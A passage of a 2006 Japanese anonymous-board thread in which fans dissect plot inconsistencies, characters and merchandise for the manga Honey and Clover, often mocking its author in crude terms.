そうなんだ・・・!森田家は当時海外に住んでたのかと思ったよ。

639 :花と名無しさん:2006/09/25(月) 22:41:24 ID:???0
>>635
読解力のないオマエが偉そうに言うな

640 :花と名無しさん:2006/09/25(月) 23:22:51 ID:???0
そんなに男女の強弱にこだわらなくちゃいけない漫画なの?これ

641 :花と名無しさん:2006/09/25(月) 23:25:25 ID:???0
>>639
教えろ厨ってどうしてどいつもこいつもこう態度でかいんだろね

642 :花と名無しさん:2006/09/25(月) 23:33:06 ID:???0
コーラスにうつってからって、ちょっと絵とか話が雑な感じになってませんか?
最終回の、竹本がアパートを去るところなんてコマがとても小さいし。
もうちょっと余韻があってもよかったのにな〜。

でも、竹本がサンドイッチ食べるところはちょっと泣きました。
自分はあんな風に手ごたえのある恋をしたことは無いので、
うらやましいかな、と。

643 :花と名無しさん:2006/09/25(月) 23:42:27 ID:???0
男女の強弱ではなくて、キャラクターほぼ全員が幼稚だという話では?

644 :花と名無しさん:2006/09/25(月) 23:50:16 ID:???0
そんなの少女漫画すべて当てはまるジャン

645 :花と名無しさん:2006/09/25(月) 23:55:06 ID:???0
初代カブタンは数ミリの大きさ。
蹴落とした社長の新居にあったのは子供が乗れる大きさ。

646 :花と名無しさん:2006/09/26(火) 00:14:03 ID:???0
>>642
臭の大好き発言聞いた後のはわわわ山田の雑さにびっくりした

647 :花と名無しさん:2006/09/26(火) 00:14:55 ID:???0
>645
何度もすいません。じゃあ乗れるカブたんはシノブか誰かの作ですね。
家の形がとても似てたものですから。
森田一家は、神社行ってびわとか取ってたから確かに日本にすんでましたね。
ありがとうございました。

648 :花と名無しさん:2006/09/26(火) 00:24:32 ID:???0
森田さんて27歳ぐらい?その年で道程ってアリエナス

649 :花と名無しさん:2006/09/26(火) 00:59:36 ID:???0
こないだ、ハチクロ映画版の修役の人と作者が対談してた本を見かけたけど、
もしかして、修はぐになったのは、それが影響しているんじゃないかと思ってしまった。
修役の人がかっこよかったからとか。

650 :花と名無しさん:2006/09/26(火) 01:02:04 ID:???O
森田は10代でとりあえずさらっと済ませてそう

651 :花と名無しさん:2006/09/26(火) 01:05:19 ID:???0
>>649
やっぱりそう思うよね

652 :花と名無しさん:2006/09/26(火) 01:08:56 ID:???O
さんざん既出。
ていうか最終巻など時折修ちゃんの顔に堺さんが乗り移ってて気色悪かった。

私の堺さん像は「香水が香るとピロリロリンと効果音の入る変なドラマの頭のおかしい彼氏役」という歪んだものなので余計気持ち悪い。
堺さんに責任はないけど。

653 :花と名無しさん:2006/09/26(火) 01:33:50 ID:???O
堺さんオタク受け凄いからね
修はぐなんて夢にも考えてなかったあの日

654 :花と名無しさん:2006/09/26(火) 01:40:52 ID:???O
>>642
じゃあ今すぐ雑草サンドイッチ作ってやるよ

655 :花と名無しさん:2006/09/26(火) 01:46:43 ID:???0
なんで堺さんってオタ女性に人気あるの?
別に嫌いじゃないけど
ファンになるほどカッコイイとかは思わなかったんだけど…。

656 :花と名無しさん:2006/09/26(火) 01:50:29 ID:???0
>>652
理花と話してるとこなんかそのものだよね。

657 :花と名無しさん:2006/09/26(火) 02:02:19 ID:???0
>香水が香るとピロリロリンと効果音の入る変なドラマ

なんてドラマ?
見てみたい

658 :花と名無しさん:2006/09/26(火) 02:07:11 ID:???0
>>655
私も同意見。
堺さん、整ったいい顔をしていると思うけど、
私はあんまりときめかない。線が細すぎる。
もうちょっと男っぽい人が好き。

659 :花と名無しさん:2006/09/26(火) 02:08:30 ID:???0
作者が境さんに出会わなければ、結末も変わっていたのだろうか…。

660 :花と名無しさん:2006/09/26(火) 02:13:52 ID:???0
>>652
それ嫉妬の香りかな?登場人物全員が疑心暗鬼の神経症気味でイカレてたドラマ。
ヘナチョコ堺と基地害オダジョの臭うような過剰演技に笑いっぱなしですた。

661 :花と名無しさん:2006/09/26(火) 06:09:42 ID:???O
そうです。
「嫉妬の香り」で検索して下されば、見てない方も爆笑間違いなし。

662 :花と名無しさん:2006/09/26(火) 08:34:40 ID:???0
>>660-661
ググった。
ドラマ見てないけど、ツッコミサイトオモシロス。
ツッコミのために見たくなったw
DVDやビデオは出てないのかな。
(アマゾンで検索してみたが出てこなかった)

タイトルが韓流ドラマみたいなセンスのないタイトルなんで
「なんじゃそのタイトルは!」と思ったんだが
辻仁成の本が原作なんだね。
辻仁成の本もエコーズ(辻のバンド)の歌詞も臭くてセンスないもんね…。

663 :花と名無しさん:2006/09/26(火) 11:31:18 ID:v30sr7PY0
>>615 ここの板の住人(腐女子)は
ヲタクのくせにヲタク扱いされることが嫌なんだよ
ハチクロの作者みたいにさ

664 :花と名無しさん:2006/09/26(火) 13:35:03 ID:???O
と、ヲタが申しております。

665 :花と名無しさん:2006/09/26(火) 13:53:54 ID:???0
毒喪男の書き込みには
反論するよりレスしないで黙って見守り続けるほうが面白いので
どうか、反論しないようおねがいします。


666 :花と名無しさん:2006/09/26(火) 15:40:00 ID:???0
最近一気読みしたんだけど、一巻に自分で作った飯がマズくて
ビックリしてと竹本のモノローグがあるのにどうして自分探しの
頃には元から料理上手だということになってるの?矛盾してない?

667 :花と名無しさん:2006/09/26(火) 15:58:00 ID:???O
大好きなお母さんの為に作った飯は旨く感じていたが、1人暮らしになったらご飯も急に味気なくなったと…まあ…無理がありますが…。

668 :花と名無しさん:2006/09/26(火) 15:59:46 ID:???0
オムレツにトマト投入みたいな創意工夫を小さい頃からしてたって設定になってたよね<自分探し
1巻だと、下宿するようになって初めて台所に立ったみたいになってるのに・・・

登場人物が途中で別人に入れ替わってるマンガだからしょうがないのか・・・

669 :花と名無しさん:2006/09/26(火) 17:17:26 ID:???0
1巻冒頭で自分の作った飯のマズさにビックリしてってモノローグは
いかにも頼りなげな竹本が1年時に悪戦苦闘してる場面を想像させて
とても良かったしすきだったのに無かったことにされて残念だ

670 :花と名無しさん:2006/09/26(火) 17:45:21 ID:???O
そのモノローグって宝島社版だと
真山のモノローグなんだっけ?

671 :花と名無しさん:2006/09/26(火) 18:20:48 ID:???0
>>670
そうそう、元は真山のモノローグだったらしい。

コミクス化にあたり「語り部は統一しなきゃ!」と思い、
モノローグを全部竹本に語らせたら
この台詞もそのまま残っちゃって
こんな大失敗☆になったそうだ。
既に多方面からさんざんご指摘を受けてるとのこと。

ソース失念。CONTINUEの羽海野インタビューだったかな?

672 :花と名無しさん:2006/09/26(火) 18:37:40 ID:11lGRozo0
最終回て聞いたけどコミックのほうはまだ最終巻でてないんですか?

673 :花と名無しさん:2006/09/26(火) 19:28:11 ID:???0
出てるよ

ここ数日あちこちから金木犀の匂いがしてその度この漫画を思い出す。

674 :花と名無しさん:2006/09/26(火) 20:11:24 ID:???O
トイレの芳香剤の匂いだね

675 :花と名無しさん:2006/09/26(火) 20:21:43 ID:???0
まぁ、臭の一人称が2話では「僕」だったり
最初からいい加減だけどな。

676 :花と名無しさん:2006/09/26(火) 20:29:41 ID:???O
細かい話だが、花本先生が山田さんのこと、呼び捨てにしたり、さん付けしたり
意味なくコロコロかわるのが気になりました。

677 :花と名無しさん:2006/09/26(火) 20:30:25 ID:???0
>670-671
モノローグは真山のままでよかったと思うんだけどね
一話は真山の日常語りで後輩が恋に落ちる様子を客観的に語ってる方がしっくり来るのに

678 :花と名無しさん:2006/09/26(火) 21:41:56 ID:???0
キャラ設定がどうの以前に、ただのシチュ萌えマンガだしなあ

どの登場人物がどの役をやってどれを演じても違和感ないって
まるでコントか演劇だ

679 :花と名無しさん:2006/09/26(火) 23:16:40 ID:???0
「努力する」と「諦める」のときの、3番目の選択支って何だったんですか?
最後まで読んだけどわかりませんでした

680 :花と名無しさん:2006/09/26(火) 23:30:29 ID:???0
何もしない。

選択せずにただ時が過ぎるのに任せる。

681 :花と名無しさん:2006/09/26(火) 23:30:45 ID:???O
「何もしない」
今の自分を何も変えないってことでは。

682 :花と名無しさん:2006/09/26(火) 23:48:26 ID:???0
>654
ホントですか?!とっても嬉しいです><
全部四葉でお願いしますね☆

683 :花と名無しさん:2006/09/27(水) 00:14:32 ID:???0
「死ぬ」じゃないのw

684 :花と名無しさん:2006/09/27(水) 01:02:35 ID:???0
森田兄弟の過去話ってナルトの25巻あたりのうちは兄弟の過去話に
ちょっと似てるような…
兄弟にコンプレックスとか父親に認められたいとかおんぶで語ったりとか復讐とか。
全然違う話しなんだけど何となく気になってしまった。

685 :花と名無しさん:2006/09/27(水) 07:29:56 ID:???0
>>684
はいはい。パクリ認定厨乙。

686 :花と名無しさん:2006/09/27(水) 08:01:34 ID:???O
作者はナルトも好きだしね

687 :花と名無しさん:2006/09/27(水) 12:25:53 ID:???0
>>685
短期だなw

688 :花と名無しさん:2006/09/27(水) 13:09:11 ID:???O
この漫画どの雑誌に掲載してたの?

689 :花と名無しさん:2006/09/27(水) 17:11:42 ID:gXaHztI70
>>684

本当だ!!そっくりだよ!!
森田兄弟の設定はナルトのサスケ兄弟のパクリで決定!!

690 :花と名無しさん:2006/09/27(水) 19:57:57 ID:???O
どっちもテンプレ設定創作性なしなのは確かだな

691 :花と名無しさん:2006/09/28(木) 00:05:52 ID:???0
今までさんざんパクりまくってるから仕方ない

692 :花と名無しさん:2006/09/28(木) 00:22:55 ID:???0
でもあれだ
不幸な兄弟も怪我した弟おんぶしたことあるアニキも現実に
たくさんいるだろうからマンガにたくさん出てきてもいいだろう
とも思った

サスケのアニキみたいな親殺しはそうはいないが


693 :花と名無しさん:2006/09/28(木) 11:52:01 ID:???0
スピノフ情報なんかある?

694 :花と名無しさん:2006/09/28(木) 13:01:28 ID:???O
コーラスゲト。
スピンオフ情報ありません。
何やら得体の知れないBOXが限定生産ででるらすぃ
(お菓子、雑貨の本+ウミノクマ人形)

この秋スピンオフ!とか言ってて、来月は12月号ですよ。
冬になってもやらねーじゃねえか。
かわりにチヤトリのクローバーが連載開始です
イラネ

695 :花と名無しさん:2006/09/28(木) 13:38:05 ID:???0
>>694さんクス

お菓子、雑貨の本+ウミノクマ人形


いらねー・・・

696 :花と名無しさん:2006/09/28(木) 14:23:53 ID:???0
またウミノクマか!

697 :花と名無しさん:2006/09/28(木) 14:40:46 ID:???0
>>694
これだね
ttp://chorus.shueisha.co.jp/hachikuro/index.html

698 :花と名無しさん:2006/09/28(木) 14:41:03 ID:???O
ああ、ウミノクマだよ!


699 :花と名無しさん:2006/09/28(木) 14:59:01 ID:???0
いらにゃい☆

700 :花と名無しさん:2006/09/28(木) 16:00:41 ID:???0
今日最終刊読んだけど竹本が主役だったはずじゃないのかという疑問が残ります
後付けまるだしのハチミツとクローバーのオチは正直いらなかったと思います
もともと読み切りの好き放題同人状態(男だらけの安アパート)のスタートから修正したのでしょうがないのかもしれない
おっさんおばさんの恋愛見たくて読んでたわけじゃないし
つか雑誌移行でおっさんおばさんウケ狙いに変更したのかなと今思ってみた
悪い意味で物わかりがいい人なのかもと

701 :花と名無しさん:2006/09/28(木) 16:24:25 ID:???0
おっさんおばさんて誰

702 :花と名無しさん:2006/09/28(木) 16:31:23 ID:???0
修とリカじゃね

703 :花と名無しさん:2006/09/28(木) 17:07:02 ID:???0
羽海野チカ先生のコーナーも大・充・実☆

なにが大・充・実☆だよw
思い切り疲れる。

704 :花と名無しさん:2006/09/28(木) 19:33:37 ID:???0
>>697
そのウミノクマは完成品でついてくるのか
作り方だけが書いてあるのか

705 :花と名無しさん:2006/09/28(木) 20:13:35 ID:???O
作中のキャラじゃなくて何で作者
需要あるのか

706 :花と名無しさん:2006/09/28(木) 21:01:37 ID:???0
>>697
ほっこりやハンドメイドが好きな主婦↓(チュプ)にはウケそうですね、それ。
http://www.google.com/search?num=50&hl=ja&ie=Shift_JIS&c2coff=1&q=%82%D9%82%C1%82%B1%82%E8%81@%83n%83%93%83h%83%81%83C%83h&lr=lang_ja

自分もそのケ(手作り系が好き)はあるのですが
その本(ハチクロ手作り本)はタダでもらってもイラネ…('A`)

漫画としてのハチクロが好きだった頃でも
グッズには興味なかったほうだし
今じゃもう、ハチクロワールドに距離をおきたいし…。
(と、いいつつ、このスレは
 元ファンだった人の愚痴や批判的意見を書きやすいので
 このスレには時々来てるけど)



707 :花と名無しさん:2006/09/28(木) 22:52:26 ID:???0
そういやさ、野宮ってケータイ海にポイ捨てしたときに
美和子にゲンコくらってたよな。(かなり小さいコマではあるが)
なのに山田にゲンコツされたとき「女の人にゲンコツされたの
初めてだ」ってのがひっかかった。あの辺で山田のこと意識し始めたんかな
って思ったんだけど、それにしちゃ動機が弱くないか…
お前美和子にもはたかれてんじゃないかっていう。

708 :花と名無しさん:2006/09/28(木) 23:07:40 ID:???O
mage

709 :花と名無しさん:2006/09/28(木) 23:15:01 ID:???0
野宮にとって美和子は女じゃないという強引な解釈はどうよ

710 :花と名無しさん:2006/09/28(木) 23:24:17 ID:???0
ハチキロの世界を表現した美味しい食べ物って…
あの奇々怪々料理?

711 :花と名無しさん:2006/09/28(木) 23:25:10 ID:???0
「真山がリカの身体の傷を初めて目にした時期」にも矛盾があるんだよNe


712 :花と名無しさん:2006/09/28(木) 23:35:38 ID:???0
>>697>>706
今時の主婦は児童向けハンドメイド雑誌のような内容で喜ぶんですかね?
ほっこり系とやらのセンスに拘りのありそうな人ほど見向きもしなさそうですがw

713 :花と名無しさん:2006/09/28(木) 23:37:58 ID:???0
>>712
喜ぶチュプもいると思うよ。
「けしごむハンコ」とか幼稚な手作りも人気だし。
自分はイラネが。

714 :花と名無しさん:2006/09/28(木) 23:38:37 ID:???0
限定BOX

集英社が必死過ぎて泣ける……哀れ。



715 :花と名無しさん:2006/09/28(木) 23:53:53 ID:???0
ところで



竹本くんのベルサイユセットどーなったの?

716 :花と名無しさん:2006/09/29(金) 00:09:45 ID:???0
>>715
そのお礼が雑草サンドです

717 :花と名無しさん:2006/09/29(金) 01:24:20 ID:???O
もし11月末発売の号に載ればギリギリ「今秋」なのかw>スピンオフ

羽海野さん、10巻に載ってたみたいな読み切りで
集英社のコミクスに載せられそうなのまだ何作かあんの?
ないとしたら、スピンオフって単行本一巻分やるのかね。
『「ハチミツとクローバー」のスピンオフ』なんて
必死な集英社が単行本未収録にするはずないと思うが。
(なんだあの手作り本…。塗り絵ってw)

勝手に一話完結の話何回か脇役主役にして描くのかと思ってたけど
続き物を描く可能性もあんのかな?
「番外編」じゃなくて「スピンオフ」だし。
変な後付け話じゃなくて割と独立した話が読みたい。

718 :花と名無しさん:2006/09/29(金) 02:00:47 ID:???0
この人って作文とかの
その場しのぎのつじつまあわせが上手なだけのタイプだよね。
全体的に見るとなんにも筋が通ってないという。
雑草サンドオチなんてハリボテ感が凄すぎる

719 :花と名無しさん:2006/09/29(金) 02:03:32 ID:???0
ハチクロスレは叩いて終わり

ハ チ ク ロ ス レ は 叩 い て 終 わ り

720 :花と名無しさん:2006/09/29(金) 04:11:51 ID:???0
>>707
真山も、散々踵落としくらってるのに山田のゲンコで驚いてたな。

721 :花と名無しさん:2006/09/29(金) 06:20:19 ID:???0
読んでムカついてもいいから最終的に山田が野宮に対して気持ちをどう決めるのかを描いてほしかった。
たぶん多くの読者が予想出来すぎてる方向に行き着いてしまったんだろうが
それでも描かないまま済まされると気持ちがすっきりしない。

722 :花と名無しさん:2006/09/29(金) 08:23:09 ID:???0
>>719
ウミノさんキレないで

723 :花と名無しさん:2006/09/29(金) 08:32:23 ID:???O
あんだけキャラやストーリーが叩かれまくってる
矢沢あいですらここまで作者叩きされてないよ…
ウミノさん自体攻撃的な人でもないのに
なんで異常な程ウミノさんの人格叩きされてるんだろう?

724 :花と名無しさん:2006/09/29(金) 08:58:05 ID:???0
色々目障りだからでは?
本人のキャラが受け付けなかったり、色んな人に媚売ったりとか

725 :花と名無しさん:2006/09/29(金) 09:27:42 ID:???0
40歳近いおばさんが幼児ぶっているとイライラするじゃない。

726 :花と名無しさん:2006/09/29(金) 09:50:38 ID:???0
みんないじめっ子だな

727 :花と名無しさん:2006/09/29(金) 11:42:58 ID:???O
女の嫉妬は怖いからな

728 :花と名無しさん:2006/09/29(金) 12:36:04 ID:???O
嫉妬厨乙

そんなにアテクシのハチグロが叩かれてるからってキレないキレない☆

729 :花と名無しさん:2006/09/29(金) 12:36:57 ID:???O
膿のが痛々しいのは事実☆だしね…

730 :花と名無しさん:2006/09/29(金) 13:47:41 ID:???0
ていうか、ハチクロの敗因って、四十路ウミノやオバサン向けコミック担当者が
ちょーっと若いオタクやサブカルにウケたからって
「わたしたち、ほっこりハイセンス中年☆ 青春リバイバル☆」(実際は幼児還り)
なんて調子にのってしまったからなんだとハッキリわかった。
そのわけわからんウミノクマ限定ボックス見て。

みんな若いキャラの若さの至福を見ていたかったんだよ。
誰もオバサン乙女の自意識なんか見せつけられたくなかったんじゃあボケ

731 :花と名無しさん:2006/09/29(金) 13:53:53 ID:???0
はぐならば歳くってシワシワの小さいオバチャンになっても
倉持くんに惚れられる〜というような妄想とか痛いね・・・

732 :花と名無しさん:2006/09/29(金) 13:55:01 ID:???0
>>723
本人が自ら進んで笑い取りに行ってんだからしょうがないだろ・・・

733 :花と名無しさん:2006/09/29(金) 14:00:45 ID:???0
>>727
女じゃなきゃあの言動にイライラしないとでも?
気にしてないのは主に男のアニヲタだけだろう。

関わったアーティストのファンで今回のタイアップきっかけにハチクロ知った奴の多くは
老若男女問わず、作品にも作者にも失笑しているよ。
攻撃とか苛めとかじゃない。ただのヲチ対象。ある意味作品以上に愛されているんだよ。

ウミノタンに拒否反応を示さない自分の高尚さを巣の外でアピるのは勘弁してくれ。
本気にしろ釣にしろ見苦しいし、いい加減飽きた。

734 :花と名無しさん:2006/09/29(金) 14:01:31 ID:???O
自分はよぼよぼの教授達が好きでした…あと美和子さん☆
出る杭は打たれるんでしょうが酷いですね


735 :花と名無しさん:2006/09/29(金) 14:08:10 ID:???O
40近いって信じられない

だって『春色のマーメイド☆』でしょ?

作品だけ見ていたかった・・・

736 :花と名無しさん:2006/09/29(金) 14:19:51 ID:???0
ヨボヨボの教授たちや美和子さんや山崎は好きだったさ。
いきなり主要キャラに踊り出たりしなかったからこそだがね

737 :花と名無しさん:2006/09/29(金) 15:31:13 ID:???O
>>734
自分語りイラネ

738 :花と名無しさん:2006/09/29(金) 15:38:05 ID:???0
>>723
矢沢あいは、本人が露出しないから。
ウミノさんは、本人が露出するから。

エッセイマンガやコミックスの柱などで
本人の露出や自分語りの多いマンガ家が
アイタタマンガ家として叩かれやすいと思うよ。
内田春菊、種村有菜、現代洋子、さくらももこ、山田南平 など。

739 :花と名無しさん:2006/09/29(金) 15:41:29 ID:???0
>>737
美和子さんが好きって人の書き込みは前に何度かあったけど
全然叩かれてなかったよ。

まだ誰も叩いてないのに
叩かれる前から「出る杭は打たれるんですね酷いですね」と
被害妄想で予防線を張るような書き込みするからウザイんですよ。
まるで「私はいじめられっこだった」「いつも泣いてた」と
主張するウミノさんにそっくりですね。
(↑ウミノさんと一緒にされてうれしいでしょ?)

740 :花と名無しさん:2006/09/29(金) 16:06:55 ID:???0
>>738
まあ頻度の問題だけでもないけどね

インタビューや演者との対談は矢沢あいの時もあったけど
ここまで滑稽なことにはなっていない
仕事として割り切ったり、求められている傾向を研究したり
好き嫌いは分かれてもファンアンチ両者からネタにされるほどの勘違いはなかった

NANAはDQN受けっぽかったけど狙った層の心鷲掴みにして売れに売れた
ハチクロはヲタ受け狙いっぽかったのにその層の中でも微妙

「アンチ少ない」と言って喜べるめでたい信者がたまにいるが
そもそも比べる対象にすらなっていないと思う
数字も力の入れ方も作者に対する信頼度も信者のウザがれ具合も

741 :花と名無しさん:2006/09/29(金) 16:20:20 ID:???0
>>723
矢沢あいの痛さは作品の中ですべて表現されているから
作品の評価=矢沢の評価じゃないの?

742 :花と名無しさん:2006/09/29(金) 17:29:04 ID:???0
NANA=酷いDQN
ハチクロ=寒いヲタク

NANA=作中の人物が下品極まりないのに開き直っている
ハチクロ=作中の人物が痛々しいことこの上ないのに自覚が薄い

NANA作者=狡い
ハチクロ作者=狡いのに、そう見せないよう演出しようと各方面でアピール必死だが
     ファンさえ呆れるほどスベリ倒す。読者を馬鹿にしている(無自覚?)


共通点
・ゴリ押し
・強引なヒロインマンセーがくどい
・作中の人物や世界観に自身の理想や欲求を露骨に反映させ始め
 元々の設定や話の筋が崩壊しグダグダになり、投げ出すファン続出
・痛い中年女性の自己投影オナニー漫画臭い

まとめるとこんな感じか

743 :花と名無しさん:2006/09/29(金) 17:43:23 ID:???0
共通点 追加

・ヒロインマンセーに説得力がない。

・それなしでは話展開させられないのかというほど
 「才能に苦悩」「不幸自慢」がくどい。

・↑のようなネタについてかなり適当な描き方なのに
 そのネタとキャラの優柔不断さだけで引っ張りすぎ。

744 :花と名無しさん:2006/09/29(金) 17:44:51 ID:???0
>>742
NANAについては、2chではアンチが多いけど
自分はそうも思わないんだがな…。
ヒロインが作者の理想とか自己投影とも思わないし。
まぁスレ違いなのでこのへんで。

745 :花と名無しさん:2006/09/29(金) 17:53:39 ID:???0
NANAは作者がさすがベテランだけあって
キャラクターや展開などを自分の好みで決めてるんじゃなくて
ひたすら読者受けのいい方に持って行ってるって気がする。
だから自己投影臭はしないな。
受ければなんでもいいって思ってる節はあるけど

746 :花と名無しさん:2006/09/29(金) 18:01:53 ID:???0
比較して色々書かれてるけど>>740が正解に近い

ハチ黒とハチ黒以外の、
ヒットした(させた)漫画やその作者の違いって言ったら
プロとアマ、「ここまで来た」と「コネで来た」って感じ

747 :花と名無しさん:2006/09/29(金) 18:40:51 ID:???0
>>742-743
あまりにばかばかしすぎる。


>>740の分析にはまぁ納得がいく。

748 :花と名無しさん:2006/09/29(金) 18:46:19 ID:???0
アンチスレでのハチクロとNANAの比較の意見

http://comic6.2ch.net/test/read.cgi/csaloon/1146626902/292-294

http://comic6.2ch.net/test/read.cgi/csaloon/1146626902/468

http://comic6.2ch.net/test/read.cgi/csaloon/1146626902/474-476


とりあえず、無知の>>741-742はすっこんでろといいたい。

749 :花と名無しさん:2006/09/29(金) 18:47:43 ID:???0
>>740>>742-743は全部同一人物だお(^^

750 :花と名無しさん:2006/09/29(金) 18:53:56 ID:???0
10巻に収録された短編とかはどうなん?
短編書いたほうがよさそう?この人

751 :花と名無しさん:2006/09/29(金) 19:27:04 ID:???0
>>750
短編だとアラが目立たないかも。
☆のオペラは良かったと言う意見が結構あったし。

でももう一つの空の小鳥は、色々とウミノさんの
「女は大切にされなくちゃイヤ」
「男はワガママな女にとことんつくさないとダメ」
「家事なんてやってられっか」
みたいな考えが透けて見えて、いやな感じだった。
ハチクロがグダグダにならなかったら、そんなこと
考えなかったかもしれないけど。

752 :花と名無しさん:2006/09/29(金) 19:39:39 ID:???0
>>748
矢沢儲の投稿デビュー神聖者キタキタキタキタ━━━(゚∀゚≡(゚∀゚≡゚∀゚)≡゚∀゚)━━━━!!

753 :花と名無しさん:2006/09/29(金) 19:57:14 ID:???0
羽海野さんの、はぐみへの自己投影がね。。。


754 :花と名無しさん:2006/09/29(金) 20:25:57 ID:???0
仕事中に貧血で倒れて「役立たずさんめ」だもんなぁw
甘っちょろい。

755 :花と名無しさん:2006/09/29(金) 20:31:10 ID:???0
森田って9巻の冒頭から唐突に暗黒化したな

756 :花と名無しさん:2006/09/29(金) 20:37:33 ID:???O
今日7巻まで一気に読んだ。画材や小物が美大って感じでナツカシス。
後半はあんまり評判良くないみたいだね…
ここでやめときゃ、幸せなままで済みますか?


757 :花と名無しさん:2006/09/29(金) 21:20:26 ID:???0
8巻から夕暮れが始まるからね

758 :花と名無しさん:2006/09/29(金) 21:57:33 ID:???0
じゃ彼を、みぃんなで「プリンス・オブ・ダークネス」と呼ぼう

759 :花と名無しさん:2006/09/29(金) 22:28:20 ID:???0
>>753
それだよね

760 :花と名無しさん:2006/09/29(金) 22:52:57 ID:???0


  人がストーカーになる瞬間を初めて見てしまった



761 :花と名無しさん:2006/09/30(土) 11:12:11 ID:???0
7巻もしくは8巻辺りで止めてそのまま最終回を読むのが一番幸せな読み方かな。(読む、という前提の場合)
少し気になる部分はあっても、殆ど違和感ないし。

762 :花と名無しさん:2006/09/30(土) 12:59:43 ID:???0
いまさらでしょうが、
真山は浴室で倒れたリカさんを看病した時にすでにかなりのことをしちゃったんですか?
北海道での台詞も初めてじゃないニュアンスだったし

763 :花と名無しさん:2006/09/30(土) 13:06:56 ID:???0
あの二人がヤルのはキモい
二人とも精神的にいっちゃってる+馬鹿っぽいので
感情移入どころか吐き気がする

764 :花と名無しさん:2006/09/30(土) 13:30:23 ID:???O
そうなんだよね。
修とリカが付き合ってったらお互い駄目になるんなら、ストーカー真山(結局自己愛?)はもっと駄目だろ、みたいな。
リカの心理がわからんから余計気持ち悪いんだよね。

765 :花と名無しさん:2006/09/30(土) 14:37:37 ID:???0
つうかそんなこといったら、2人に限らず

ほぼ全キャラ精神的にいっちゃってる+馬鹿っぽい
+無神経+ウミノタンの願望欲求理想の化身っぽい
ので、感情移入どころか吐き(ry

766 :花と名無しさん:2006/09/30(土) 14:50:14 ID:???0
本気で気持ち悪いよね。真山とリカ…。

767 :花と名無しさん:2006/09/30(土) 15:27:57 ID:???0
臭とはぐも気持ち悪い。

768 :花と名無しさん:2006/09/30(土) 16:19:23 ID:???0
ハチクロ自体が性的な接触は排除した作りなのに
真山とリカの話だけ別扱いだから不自然なんだよね

769 :花と名無しさん:2006/09/30(土) 16:28:51 ID:???0
うみのさんもキモイ
ttp://www.towerrecords.co.jp/sitemap/CSfLayoutB.jsp?DISP_NO=003991#selection

770 :花と名無しさん:2006/09/30(土) 17:18:10 ID:???0
なんか真山修リカと、竹本はぐ森田との間に
作り手で明確な区別をつけてるよーな気がするから
しゃーないといえばしゃーない。
真山とリカの話は違いを出すために浮かせてるんだと思ってる

771 :花と名無しさん:2006/09/30(土) 18:31:18 ID:???0
げえ、ウミノセレクションCDほとんど持ってる…キモイ、てか泣きたい。



772 :花と名無しさん:2006/09/30(土) 19:00:56 ID:???0
いくら人によって対応変えることは当たり前だとしても
修のキャラが真山リカ編と竹本森田はぐ編で別人すぎ

773 :花と名無しさん:2006/09/30(土) 20:04:34 ID:???0
>>771
771の音楽の趣味は悪くないよ。
ウミノさんが、好きなCDに
「これはハチクロのキャラのイメージソング」
みたいなことをいちいち語るのが気持ち悪いんだよ。

中高生の女の子なら
「キャー。この歌って○○のイメージソングだよね!!」
みたいなことを友達同士で語ったりしてても
10代の子の言うことだし、まだ、ほほえましいと思えるんだが
40歳のおばさんがそういうことを人前で語るかなぁ…と
かなりポカーンとしてしまった。

774 :花と名無しさん:2006/09/30(土) 21:11:44 ID:???0
キューコミからずっと読んでたけど
結局なんだったんだろう、この漫画。
終わり方が唐突すぎ。

775 :花と名無しさん:2006/09/30(土) 21:20:47 ID:???0
>>773
あーそれそれ
いい歳した大人がオタクのアイタタぶりを
世界に発信できるのが信じられない。
この世の情報媒体すべてがこの人にとっての同人誌なのかも。

776 :花と名無しさん:2006/09/30(土) 21:31:29 ID:???0
美しく燃える森が原田とリカと修ちゃんのテーマ曲なんだ。
以外だ。

777 :花と名無しさん:2006/09/30(土) 21:32:34 ID:???O
よくわからないが、どうしてリカはスペインから急いで帰国しようとしたんだ?
怪我をしたのは面識もなさそうなはぐだし、大学をやめることがリカにとって重大なことなんだろうか?
しかもなんで別れにつながるんだ?

778 :花と名無しさん:2006/09/30(土) 21:41:25 ID:???O
つか もう終わったんだし 最後らへん 納得してないやつらは こなきゃいいのにw

779 :花と名無しさん:2006/09/30(土) 21:49:21 ID:???0
>>775
バツテリーという野球児童文学を描いてる
あさのあつこっていう40代のオバハンは
ウミノさんと同レベルに痛いぞ。

あさのの中学生の息子の同級生の肉体に
欲情したことをインタビューで
恥ずかしげもなく暴露。↓
books.yahoo.co.jp/interview/detail/31476644/01.html

日本はもうダメぽ…_| ̄|○


780 :花と名無しさん:2006/09/30(土) 21:51:41 ID:???0
>>779
ドウーイなのはやまやまだけど
流石にスレ違いだろ。

781 :花と名無しさん:2006/09/30(土) 21:53:17 ID:???0
自分の母親くらいの年齢の人が
>>769>>779のリンク先みたいな発言してるってのが

:y=-( ゚д゚)・[;; ターン

782 :花と名無しさん:2006/09/30(土) 22:04:03 ID:???0
スレ違いだけどあさのの作品いつか読んでみるかと思ってた自分にorz
こんな人だったのかよ

783 :花と名無しさん:2006/09/30(土) 22:36:06 ID:???0
私は後半の展開で幻滅したけど
男友達は最終回で泣けたとか感動したとかすごく言ってて驚いた。
うすたきょうすけも泣けたと言っていたけど
竹本に感情移入する男読者にとっては名作なの?

784 :花と名無しさん:2006/09/30(土) 22:48:48 ID:???0
あさのも何かと評判悪いよなー

>>783
え、とうとううすたもハチクロに※出したの?
あーあ


785 :花と名無しさん:2006/09/30(土) 22:54:14 ID:???0
だいぶ前に色々コメント出してた
自分も前から自転車で旅がしたかったとか

786 :花と名無しさん:2006/09/30(土) 22:55:45 ID:???0
てか森田って最終巻時に28??

787 :花と名無しさん:2006/09/30(土) 23:56:35 ID:???0
>>779
スレチひっぱってすまんが、べつに「欲情」ってはとらえられないよ、あのインタビュー。
「触れるものならさわりたい」ってたしかに痴漢みたいだけど(w


788 :花と名無しさん:2006/10/01(日) 00:40:33 ID:???0
>>784

ttp://homepage2.nifty.com/usuta/note/9-19.html


789 :花と名無しさん:2006/10/01(日) 00:56:52 ID:???O
ハチクロを何かしら取り上げる男性作家よく見かけるね。
ぱっと思い出せるだけで
あずまきよひこ、西義之、久米田、最終兵器彼女の作者

790 :花と名無しさん:2006/10/01(日) 01:01:36 ID:???0
>>762
やったにしろやってないにしろ
貧血起こして死にそうな理花さんにしっかり欲情して
それを隠さない真山をうっとりして描いてそうなウミノさんに呆れた
その真山の口癖が「父さん」という皮肉・・・
自分を父さんと呼ぶ男にセックスされる夢でもみてるのかと
最終的に竹本ではなく修ちゃんを徹底してマンセーしていた真山の姿がめっちゃ寒かった
